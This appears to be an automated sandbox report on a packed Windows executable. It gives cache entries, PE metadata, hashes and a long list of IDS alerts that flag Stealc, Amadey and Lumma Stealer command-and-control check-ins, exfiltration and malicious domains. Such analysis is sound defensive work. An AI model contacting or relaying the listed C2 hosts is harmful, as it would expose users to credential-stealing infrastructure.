URL:	"https://www.gstatic.com/og/_/ss/k=og.qtm.gyN29IQRsEA.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTthb_7uL8fi0CBKDba3xi6R0PUU9w"
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 519

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:	48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
URL:	https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9467851595774155
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'815'040 bytes
MD5:	a12c379025757cc07db3a875813f8b1e
SHA1:	f6ef51d787cf590dce1d9f2b1cb66d4794eeb89e
SHA256:	6515d31657b9961bb6b8bf78f59a27925e6bbdefee8b91c51d4133c9aea703e1
SHA512:	6dba4296d7b4d7ba8599f33a79fd3a458fb2cf6116fd2ee00dbf46ce3e0eeab1f5f26c7017d99a9794cc44ac36dadbe0e0ec499419b56f31d66aa78c26c1a15b
SSDEEP:	49152:zr6OE2OwYPoKIofoMnJT1LNHS4uiAch6SofcXQV:XxE2MEMT1L5S4uiOSofcX
TLSH:	2E8533455D80571ED098B93F70E35BAF2B66C4009BC98551BF48579EB0A3BAC44F2F8B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xa9b000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F28C4D8698Ah
seto byte ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add cl, byte ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [0000000Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x24b04d	0x61	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24b1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x249000	0x16200	b9137d29f3ba34136e3d385f4a9146b7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x24a000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x24b000	0x1000	0x200	0d0399d83a742d5d86c5718841e8e842	False	0.134765625	data	0.8646718654202081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x24c000	0x2ac000	0x200	9366ec7e259b3cf0b5d0f1bf4f3ff7e3	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xxdbzcjj	0x4f8000	0x1a2000	0x1a1600	d30471941b8a19fefd70747c4407e165	False	0.9948846726190477	data	7.9542877120760425	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
txsnlhpz	0x69a000	0x1000	0x400	123e92b7f4e19dbaee9f8adfeabdd1fc	False	0.7578125	data	5.957339304300158	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x69b000	0x3000	0x2200	d417f2a662e1b2da9d1d39be3c1f8763	False	0.103515625	DOS executable (COM)	1.2493337287750075	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-12T00:06:04.246324+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-12T00:06:04.450848+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-12T00:06:04.456977+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.5	49704	TCP
2024-11-12T00:06:04.654225+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-12T00:06:04.661283+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.5	49704	TCP
2024-11-12T00:06:05.584231+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-12T00:06:06.046710+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49704	185.215.113.206	80	TCP
2024-11-12T00:06:21.681575+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.5	49732	TCP
2024-11-12T00:06:25.781732+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49758	185.215.113.206	80	TCP
2024-11-12T00:06:26.762412+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49758	185.215.113.206	80	TCP
2024-11-12T00:06:27.224531+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49758	185.215.113.206	80	TCP
2024-11-12T00:06:27.554559+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49758	185.215.113.206	80	TCP
2024-11-12T00:06:28.360328+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49758	185.215.113.206	80	TCP
2024-11-12T00:06:28.641359+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49758	185.215.113.206	80	TCP
2024-11-12T00:06:32.815945+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49957	185.215.113.16	80	TCP
2024-11-12T00:07:01.008650+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.5	50222	TCP
2024-11-12T00:07:04.298247+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	50229	185.215.113.43	80	TCP
2024-11-12T00:07:07.864239+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50236	31.41.244.11	80	TCP
2024-11-12T00:07:10.340648+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.5	50234	TCP
2024-11-12T00:07:11.134462+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50242	185.215.113.43	80	TCP
2024-11-12T00:07:11.536551+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50244	172.67.174.133	443	TCP
2024-11-12T00:07:11.780315+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50245	31.41.244.11	80	TCP
2024-11-12T00:07:12.049130+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50244	172.67.174.133	443	TCP
2024-11-12T00:07:12.049130+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50244	172.67.174.133	443	TCP
2024-11-12T00:07:12.691755+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50247	172.67.174.133	443	TCP
2024-11-12T00:07:13.063395+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50247	172.67.174.133	443	TCP
2024-11-12T00:07:13.063395+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50247	172.67.174.133	443	TCP
2024-11-12T00:07:13.975556+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50252	172.67.174.133	443	TCP
2024-11-12T00:07:14.000219+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50250	185.215.113.43	80	TCP
2024-11-12T00:07:14.493834+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	50252	172.67.174.133	443	TCP
2024-11-12T00:07:15.112528+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50254	192.64.117.218	443	TCP
2024-11-12T00:07:15.112528+0100	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	1	192.168.2.5	50254	192.64.117.218	443	TCP
2024-11-12T00:07:15.112528+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	50254	192.64.117.218	443	TCP
2024-11-12T00:07:15.612730+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50256	172.67.174.133	443	TCP
2024-11-12T00:07:17.004930+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50257	172.67.174.133	443	TCP
2024-11-12T00:07:18.698059+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50260	172.67.174.133	443	TCP
2024-11-12T00:07:18.906842+0100	2856121	ETPRO MALWARE Amadey CnC Activity M2	1	192.168.2.5	50259	185.215.113.43	80	TCP
2024-11-12T00:07:19.589306+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50263	185.215.113.16	80	TCP
2024-11-12T00:07:19.675333+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50262	176.9.192.202	443	TCP
2024-11-12T00:07:20.088767+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50264	172.67.174.133	443	TCP
2024-11-12T00:07:20.092582+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50264	172.67.174.133	443	TCP
2024-11-12T00:07:21.006719+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50265	176.9.192.202	443	TCP
2024-11-12T00:07:21.884469+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	54876	1.1.1.1	53	UDP
2024-11-12T00:07:21.918949+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	61484	1.1.1.1	53	UDP
2024-11-12T00:07:21.946767+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	55296	1.1.1.1	53	UDP
2024-11-12T00:07:21.986434+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	58600	1.1.1.1	53	UDP
2024-11-12T00:07:22.018387+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	61200	1.1.1.1	53	UDP
2024-11-12T00:07:22.055144+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.5	54900	1.1.1.1	53	UDP
2024-11-12T00:07:22.087575+0100	2057119	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store)	1	192.168.2.5	65482	1.1.1.1	53	UDP
2024-11-12T00:07:22.114851+0100	2057101	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store)	1	192.168.2.5	50625	1.1.1.1	53	UDP
2024-11-12T00:07:22.446484+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50269	176.9.192.202	443	TCP
2024-11-12T00:07:22.764245+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50270	23.210.122.61	443	TCP
2024-11-12T00:07:23.418773+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50271	185.215.113.43	80	TCP
2024-11-12T00:07:23.498338+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	50270	23.210.122.61	443	TCP
2024-11-12T00:07:23.544745+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50273	172.67.174.133	443	TCP
2024-11-12T00:07:23.806432+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50272	176.9.192.202	443	TCP
2024-11-12T00:07:23.907036+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50273	172.67.174.133	443	TCP
2024-11-12T00:07:23.963934+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50278	188.114.96.3	443	TCP
2024-11-12T00:07:24.072337+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50276	185.215.113.16	80	TCP
2024-11-12T00:07:24.330042+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50278	188.114.96.3	443	TCP
2024-11-12T00:07:24.330042+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50278	188.114.96.3	443	TCP
2024-11-12T00:07:24.893780+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50282	188.114.96.3	443	TCP
2024-11-12T00:07:25.214943+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50282	188.114.96.3	443	TCP
2024-11-12T00:07:25.214943+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50282	188.114.96.3	443	TCP
2024-11-12T00:07:26.279773+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50285	188.114.96.3	443	TCP
2024-11-12T00:07:27.534071+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50286	188.114.96.3	443	TCP
2024-11-12T00:07:27.767332+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50287	185.215.113.43	80	TCP
2024-11-12T00:07:29.060470+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50290	188.114.96.3	443	TCP
2024-11-12T00:07:29.461255+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50289	185.215.113.206	80	TCP
2024-11-12T00:07:31.194919+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50291	185.215.113.43	80	TCP
2024-11-12T00:07:31.364196+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50292	188.114.96.3	443	TCP
2024-11-12T00:07:31.777124+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	50292	188.114.96.3	443	TCP
2024-11-12T00:07:31.945988+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50293	185.215.113.16	80	TCP
2024-11-12T00:07:33.686758+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50294	188.114.96.3	443	TCP
2024-11-12T00:07:33.718631+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50294	188.114.96.3	443	TCP
2024-11-12T00:07:36.193359+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50295	185.215.113.43	80	TCP
2024-11-12T00:07:36.539465+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	54284	1.1.1.1	53	UDP
2024-11-12T00:07:36.568074+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	50952	1.1.1.1	53	UDP
2024-11-12T00:07:36.595892+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	62605	1.1.1.1	53	UDP
2024-11-12T00:07:36.679868+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	54551	1.1.1.1	53	UDP
2024-11-12T00:07:36.706084+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	52747	1.1.1.1	53	UDP
2024-11-12T00:07:36.732417+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.5	56622	1.1.1.1	53	UDP
2024-11-12T00:07:36.761515+0100	2057119	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store)	1	192.168.2.5	60270	1.1.1.1	53	UDP
2024-11-12T00:07:36.816741+0100	2057101	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scriptyprefej .store)	1	192.168.2.5	49989	1.1.1.1	53	UDP
2024-11-12T00:07:37.517306+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50296	23.197.127.21	443	TCP
2024-11-12T00:07:37.642059+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50297	188.114.96.3	443	TCP
2024-11-12T00:07:38.106267+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.5	50296	23.197.127.21	443	TCP
2024-11-12T00:07:38.182349+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50297	188.114.96.3	443	TCP
2024-11-12T00:07:38.671833+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50301	188.114.96.3	443	TCP
2024-11-12T00:07:40.312956+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50301	188.114.96.3	443	TCP
2024-11-12T00:07:40.312956+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50301	188.114.96.3	443	TCP
2024-11-12T00:07:41.129192+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50303	188.114.96.3	443	TCP
2024-11-12T00:07:41.495718+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50303	188.114.96.3	443	TCP
2024-11-12T00:07:41.495718+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50303	188.114.96.3	443	TCP
2024-11-12T00:07:42.305648+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50304	188.114.96.3	443	TCP
2024-11-12T00:07:44.188296+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50306	188.114.96.3	443	TCP
2024-11-12T00:07:45.449972+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50307	185.215.113.206	80	TCP
2024-11-12T00:07:46.222681+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50309	188.114.96.3	443	TCP
2024-11-12T00:07:48.123231+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50311	188.114.96.3	443	TCP
2024-11-12T00:07:49.684033+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50313	188.114.96.3	443	TCP
2024-11-12T00:07:49.688845+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	50313	188.114.96.3	443	TCP
2024-11-12T00:07:52.464877+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50316	188.114.96.3	443	TCP
2024-11-12T00:07:52.884363+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50316	188.114.96.3	443	TCP
2024-11-12T00:07:56.119310+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50319	185.215.113.206	80	TCP
2024-11-12T00:08:02.327561+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50323	185.215.113.206	80	TCP
2024-11-12T00:08:02.381356+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	49494	1.1.1.1	53	UDP
2024-11-12T00:08:02.410127+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	56957	1.1.1.1	53	UDP
2024-11-12T00:08:02.436345+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	60011	1.1.1.1	53	UDP
2024-11-12T00:08:02.466019+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	55407	1.1.1.1	53	UDP
